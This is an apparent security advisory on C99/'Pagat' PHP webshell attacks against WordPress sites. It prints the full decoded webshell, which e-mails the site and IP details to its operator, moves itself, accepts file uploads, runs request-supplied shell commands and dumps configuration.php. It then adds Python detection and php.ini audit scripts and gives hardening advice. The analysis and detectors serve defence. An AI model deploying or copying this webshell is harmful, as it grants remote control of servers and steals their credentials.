WordPress C99 PHP webshell attacks intensify: Anheng Mingyu APT warning platform webshell audit warning
Recently, the IBM Managed Security Services (MSS) team issued a warning that it had detected a large number of WordPress sites under a new wave of attacks using the C99 PHP webshell, reminding WordPress site administrators to scan for and fix site vulnerabilities promptly.
Based on the IBM MSS team's long-term monitoring and analysis of malicious events, its security researchers found that over the past two months there had been traffic anomalies caused by the C99 class of webshells: 404 incidents were detected in March, and 588 incidents were detected in March, as shown below:
For more information, see https://securityintelligence.com/got-wordpress-php-c99-webshell-attacks-increasing/
Anheng Research Institute collected C99 webshell samples via Google search.
After decoding, the sample reads as follows:
```php
<?php
error_reporting(0);
// First request in a session: e-mail the operator where the shell landed
// ("ada yang inject" / "Hasil Bajakan" are Indonesian: "someone injected" / "hijack result").
if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER['HTTP_HOST'];
    $inj = $_SERVER['REQUEST_URI'];
    $body = "ada yang inject\n{$web}{$inj}";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = 'SAFE_MODE = OFF';
    } else {
        $security = 'SAFE_MODE = ON';
    }
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail('cumicd@gmail.com', "{$body}", "Hasil Bajakan http://{$web}{$inj}\n{$security}\nIP Server={$serper}\nIP Injector={$injektor}");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
}
// ?clone : move the shell to a less conspicuous path (images/stories is a Joomla directory)
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . '/images/stories/food/footer.php';
    rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = 'SAFE_MODE: OFF';
} else {
    $security = 'SAFE_MODE: ON';
}
// Banner and host reconnaissance (the HTML markup was lost in extraction; only the text survives)
echo "Pagat-Shell\n";
echo $security . "\n";
$cur_user = '(' . get_current_user() . ')';
echo 'User: uid=' . getmyuid() . $cur_user . ' gid=' . getmygid() . $cur_user . "\n";
echo 'Uname: ' . php_uname() . "\n";
// Current directory with a trailing separator (note the assignments inside the conditions)
function pwd()
{
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        }
    } elseif ($u = strrpos($cwd, '\\')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '\\';
        } else {
            return $cwd;
        }
    }
}
echo ''; // upload form markup stripped in extraction
echo '';
// File upload into the current directory, optionally renamed via POST 'newname'
if (isset($_POST['submit'])) {
    $uploaddir = pwd();
    if (!($name = $_POST['newname'])) {
        $name = $_FILES['userfile']['name'];
    }
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    // As in the sample: the file is moved twice and the messages are inverted
    // ("GAGAL" is Indonesian for "failed"), so "Success" prints when the second move fails.
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
        echo 'upload GAGAL !!! ';
    } else {
        echo 'upload Success to ' . $uploaddir . $name . ' :\P ';
    }
}
// Command execution: POST 'cmd' (gated on the 'command' field), GET 'cmd', or ?RF to dump
// the Joomla configuration.php; the default action lists the current directory.
if (isset($_POST['command'])) {
    $cmd = $_POST['cmd'];
    echo "\n" . shell_exec($cmd) . "\n";
} elseif (isset($_GET['cmd'])) {
    $comd = $_GET['cmd'];
    echo "\n" . shell_exec($comd) . "\n";
} elseif (isset($_GET['RF'])) {
    $rf = file_get_contents('../configuration.php');
    echo $rf;
} else {
    echo "\n" . shell_exec('ls -la') . "\n";
}
?>
```
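As an added example (not code from the advisory, IBM, or the shell's author), the following Python script performs the kind of static audit the decoded sample above invites and that security suggestion 4 below asks for: it peels the eval(gzinflate(base64_decode('...'))) wrapper in which such shells are commonly packaged (the form the advisory refers to as needing decoding), then flags the behaviours seen in the decoded sample, namely request-controlled shell_exec, arbitrary file upload, an e-mail beacon, self-relocation via rename, and reading configuration.php or wp-config.php. The PHP inputs, indicator weights and verdict thresholds are constructed for this example, and `scan_tree` also looks at `.txt` files because the report mentions pagat.txt.

```python
"""Static webshell indicator scan: added example, not code from the advisory.

The indicators mirror what the decoded C99/'Pagat' sample above does; the
inputs below are constructed stand-ins, not real captures.
"""
import base64
import os
import re
import zlib

# (name, weight, pattern). Weight 0 = only meaningful in combination.
INDICATORS = [
    ("exec-function",   4, re.compile(r"\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\(")),
    ("request-input",   0, re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")),
    ("file-upload",     2, re.compile(r"\bmove_uploaded_file\s*\(")),
    ("mail-call",       0, re.compile(r"\bmail\s*\(")),
    ("remote-addr",     0, re.compile(r"REMOTE_ADDR|SERVER_ADDR")),
    ("config-read",     3, re.compile(r"file_get_contents\s*\(\s*['\"][^'\"]*(configuration|wp-config)\.php")),
    ("rename-call",     0, re.compile(r"\brename\s*\(")),
    ("script-filename", 0, re.compile(r"SCRIPT_FILENAME")),
    ("safe-mode-probe", 1, re.compile(r"ini_get\s*\(\s*['\"]safe_mode")),
    ("host-recon",      1, re.compile(r"\b(php_uname|get_current_user|getmyuid|getmygid)\s*\(")),
]
# Combinations carry the real weight: an exec function alone is common in
# admin tooling; an exec function next to request input is not.
COMBOS = [
    ("request-controlled-command", 6, {"exec-function", "request-input"}),
    ("attacker-notification",      3, {"mail-call", "remote-addr"}),
    ("self-relocation",            3, {"rename-call", "script-filename"}),
]
LOADER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)")

def unpack(src, max_layers=5):
    """Peel eval(gzinflate(base64_decode('...'))) wrappers; returns (innermost source, layers)."""
    layers = 0
    while layers < max_layers:
        m = LOADER.search(src)
        if not m:
            break
        try:
            blob = base64.b64decode(re.sub(r"\s", "", m.group(1)), validate=True)
            src = zlib.decompress(blob, -15).decode("utf-8", "replace")  # -15: raw deflate, as gzinflate
        except (ValueError, zlib.error):
            break
        layers += 1
    return src, layers

def scan(src):
    """Score one PHP source; returns layers, findings with weights, score and verdict."""
    body, layers = unpack(src)
    hit = {name for name, _w, rx in INDICATORS if rx.search(body)}
    findings = {name: w for name, w, _rx in INDICATORS if name in hit and w > 0}
    for name, w, needs in COMBOS:
        if needs <= hit:
            findings[name] = w
    if layers:
        findings["packed-loader"] = 3 * layers
    score = sum(findings.values())
    verdict = "webshell" if score >= 8 else "suspicious" if score >= 3 else "clean"
    return {"layers": layers, "findings": findings, "score": score, "verdict": verdict}

def scan_tree(root):
    """Scan .php/.phtml/.txt files under root; returns only the non-clean reports."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".php", ".phtml", ".txt")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report = scan(fh.read())
                if report["verdict"] != "clean":
                    hits[path] = report
    return hits

def pack_for_test(php):
    """Build the eval(gzinflate(base64_decode(...))) wrapper so the unpacker can be exercised."""
    co = zlib.compressobj(wbits=-15)  # raw deflate, which is what gzinflate expects
    blob = base64.b64encode(co.compress(php.encode()) + co.flush()).decode()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % blob

# Constructed stand-in with the decoded sample's behaviours (not a copy of it).
SAMPLE_SHELL = """<?php
error_reporting(0);
$hit = $_SERVER['REMOTE_ADDR'];
mail('operator@example.invalid', 'hit', "host {$hit}");
if (isset($_GET['clone'])) { rename($_SERVER['SCRIPT_FILENAME'], $_SERVER['DOCUMENT_ROOT'].'/images/x.php'); }
if (isset($_POST['submit'])) { move_uploaded_file($_FILES['f']['tmp_name'], getcwd().'/'.$_POST['n']); }
if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); }
if (isset($_GET['RF'])) { echo file_get_contents('../wp-config.php'); }
?>"""
# Constructed benign handler: reads request input but never executes it.
SAMPLE_PLUGIN = """<?php
if (isset($_POST['title'])) {
    update_option('my_plugin_title', sanitize_text_field($_POST['title']));
}
?>"""

if __name__ == "__main__":
    for label, code in (("plain", SAMPLE_SHELL), ("packed", pack_for_test(SAMPLE_SHELL)),
                        ("benign", SAMPLE_PLUGIN)):
        r = scan(code)
        print(f"{label:7s} layers={r['layers']} score={r['score']:2d} {r['verdict']:10s} {sorted(r['findings'])}")
```

Run it with no arguments to see the three constructed inputs scored, or call `scan_tree('/path/to/wp-content/uploads')` to triage a real upload directory. The combination rules are what keep the false-positive rate tolerable: a plugin that merely reads `$_POST` scores zero, while the same request input feeding `shell_exec` is what drives the sample to a webshell verdict.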
Further analysis of WordPress victims was done with a Google search for "pagat shell": https://www.google.com.hk/?gws_rd=ssl#safe=strict&q=pagat+shell
The webshell allows attackers to run terminal commands on the server or upload new files to the site; the new files can be further webshells, DDoS clients, Bitcoin mining software, or other malware.
According to the IBM MSS team, a Google search alone (as of the report date) turned up a number of WordPress sites hosting pagat.txt files.
The APT warning platform monitors webshell attack behaviour in real time and alerts on C99 webshells that fail to evade its rules, so webshell attacks can be detected at the earliest stage.
Security suggestions:
Given the current situation, site administrators are advised to take the following measures:
1. Edit the php.ini file to disable base64 decoding: find the "disable_functions =" directive and set it to "disable_functions = eval, base64_decode, gzinflate";
2. Rename the upload folder. WordPress writes files to the upload folder through its uploader; if the default name is kept, attackers can easily guess the path of uploaded files, which greatly lowers the cost of uploading PHP files containing shell scripts;
3. Install a mature security plugin, such as the Wordfence WordPress plugin;
4. Perform security scanning. Use an open-source scanning tool such as ModSecurity to scan all uploaded files; at the same time use AWVS or a WordPress security scanner to scan the site, find vulnerabilities promptly, and repair and harden them;
5. If the site has already been infected, change the passwords of all site management accounts promptly and notify site users to change their passwords.
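As an added example (not part of the advisory), the following Python script audits a php.ini fragment against suggestion 1. It parses the last active `disable_functions` directive (comments and quoting handled), reports which recommended names are covered, and separately reports `eval`: eval is a language construct rather than a function, so PHP ignores it in `disable_functions` and the advisory's literal setting does not actually block eval. The script also checks, as an addition beyond the advisory's three names, the process-execution functions the decoded sample above calls (`shell_exec` and its relatives). The php.ini text is constructed for this example; whether legitimate plugins on a given site depend on `base64_decode` should be confirmed before disabling it.

```python
"""php.ini disable_functions audit: added example, not part of the advisory."""
import re

# The three names suggestion 1 lists, plus (an addition of this example) the
# process-execution functions the decoded C99 sample actually calls.
RECOMMENDED = ("eval", "base64_decode", "gzinflate")
EXEC_FUNCTIONS = ("shell_exec", "system", "passthru", "exec", "popen", "proc_open")
# eval is a language construct, not a function: a disable_functions entry for it
# is silently ignored by PHP, so the audit reports it instead of counting it as covered.
NOT_FUNCTIONS = {"eval"}

def parse_disable_functions(ini_text):
    """Return the names in the last active disable_functions directive (later lines win)."""
    names = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a php.ini comment
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"')
            names = {n.strip() for n in value.split(",") if n.strip()}
    return names

def audit(ini_text, wanted=RECOMMENDED + EXEC_FUNCTIONS):
    """Compare the directive against the wanted list; 'ineffective' lists entries PHP ignores."""
    disabled = parse_disable_functions(ini_text)
    return {
        "covered":     sorted(n for n in wanted if n in disabled and n not in NOT_FUNCTIONS),
        "missing":     sorted(n for n in wanted if n not in disabled and n not in NOT_FUNCTIONS),
        "ineffective": sorted(n for n in disabled if n in NOT_FUNCTIONS),
    }

# Constructed php.ini fragment that follows suggestion 1 literally.
SAMPLE_INI = """; constructed fragment
disable_functions =
disable_functions = eval, base64_decode, gzinflate   ; as in the advisory
"""

if __name__ == "__main__":
    for key, names in audit(SAMPLE_INI).items():
        print(f"{key:12s} {', '.join(names) or '-'}")
```

On the constructed fragment the audit reports `base64_decode` and `gzinflate` as covered, `eval` as ineffective, and the six execution functions as missing; the "ineffective" line is the one to act on, since the sample's command execution path runs through `shell_exec`, not `eval`.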
Security researcher: zise